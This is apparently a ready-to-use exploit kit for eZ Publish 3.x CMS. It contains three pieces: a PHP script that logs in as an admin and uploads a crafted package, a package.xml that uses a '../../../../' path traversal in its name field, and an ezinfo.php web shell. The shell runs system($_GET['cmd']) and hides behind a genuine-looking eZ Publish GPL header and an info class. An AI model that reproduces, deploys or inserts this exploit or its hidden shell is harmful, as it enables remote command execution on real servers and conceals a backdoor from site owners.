// eZPublish_abuse_of_functionality_zero_day.php
--------------------------------------------------------------
<?php
/* eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.x
* tested on version 3.9.0, 3.9.5, 3.10.1
usage:
# ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server
The options are required:
-u Login of the exists admin on eZ Publish -p Admin password on eZ Publish -s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/ [+] Exploit successfully sending [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand> */
function help_argc($script_name) { print " usage:
# ./".$script_name." -u=username -p=password -s=EZPublish_server
The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -s Target eZ Publish admin interface
example:
# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/ [+] Exploit successfully sending [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand> "; }
function successfully($server) {
$server = substr($server,7,strpos($server,"/",7)-7);
print " [+] Exploit successfully sending [+] For OS Commanding executing go to: http://$server/ezinfo/about?cmd=<OScommand> "; }
if ($argc != 4 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) { help_argc($argv[0]); exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg,1,1); if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); } }
if ($ARG[u] && $ARG[p] && $ARG[s]) { if (file_exists("ez_exploit.ezpkg")) {
$post_login_fields = array( 'Login' => $ARG[u], 'Password' => $ARG[p], 'LoginButton' => '1', 'RedirectURI' => '' );
$headers = array( 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s] );
$res_http = new HttpRequest($ARG[s]."/user/login", HttpRequest::METH_POST); $res_http->addPostFields($post_login_fields); $res_http->addHeaders($headers); try { $http_response = $res_http->send();
if (eregi("message-warning", $http_response->getBody())) { print "[-] Login failed"; exit(0); } else { $http_headers = $http_response->getHeaders(); if ($http_headers['Set-Cookie']) {
$eZcookie = explode(";",$http_headers['Set-Cookie']); $eZadmcookie = explode("=",$eZcookie[0]);
$cookies = array( $eZadmcookie[0] => $eZadmcookie[1] );
$post_fields = array( 'MAX_FILE_SIZE' => '32000000', 'UploadPackageButton' => '1' );
$res_http = new HttpRequest($ARG[s]."/package/upload", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); $res_http->addCookies($cookies); $res_http->addPostFile("PackageBinaryFile","ez_exploit.ezpkg","multipart/form-data"); try { $http_response = $res_http->send();
if (!eregi("UploadPackageButton", $http_response->getBody())) { successfully($ARG[s]); } else { print "[-] Exploit failed"; }
} catch (HttpException $exception) {
print "[-] Not connected"; exit(0);
}
} else { print "[-] Error get cookie"; }
}
} catch (HttpException $exception) {
print "[-] Not connected"; exit(0);
}
} else { print "[-] File ez_exploit.ezpkg not found\n"; print "[-] Exploit failed"; } } else { help_argc($argv[0]); exit(0); } }
?>
-------------------------------------------------------------
//ezinfo.php
-------------------------------------------------------------
<?php print "<pre>"; system($_GET['cmd']); print "</pre>";
// // SOFTWARE NAME: eZ publish // SOFTWARE RELEASE: 3.9.0 // BUILD VERSION: 17785 // COPYRIGHT NOTICE: Copyright (C) 1999-2006 eZ systems AS // SOFTWARE LICENSE: GNU General Public License v2.0 // NOTICE: > // This program is free software; you can redistribute it and/or // modify it under the terms of version 2.0 of the GNU General // Public License as published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of version 2.0 of the GNU General // Public License along with this program; if not, write to the Free // Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, // MA 02110-1301, USA. // //
class ezdhtmlInfo { function info() { return array( 'Name' => "eZ Online Editor", 'Version' => "4.2", 'Copyright' => "Copyright (C) 1999-2006 eZ systems AS", 'License' => "GNU General Public License v2.0", ); } } ?>
---------------------------------------------------------------------------------
//package.xml
---------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?> <package version="3.8.0" development="false" is_active="true" install_type="import"> <name>../../../../extension/ezdhtml</name> <summary>Website Interface</summary> <description>Website Interface is a web based CMS solution based on eZ Publish. It contains templates and settings that meets the most common requirements for content management systems.</description> <vendor>eZ systems</vendor> <type value="site" /> <ezpublish> <version>3.8.0</version> <named-version>3.8</named-version> </ezpublish> <maintainers> <maintainer> <name>Administrator User</name> <email>nospam@ez.no</email> <role>lead</role> </maintainer> </maintainers> <packaging> <timestamp>1153313252</timestamp> <host>packages.jkn.ez.no</host> </packaging> <documents> <document mime-type="text/plain" name="LICENCE" /> </documents> <changelog> <entry person="Administrator User" email="nospam@ez.no" release="1"> <change>Creation of package.</change> </entry> </changelog> </package>
------------------------------------------------------------------------------------------------
|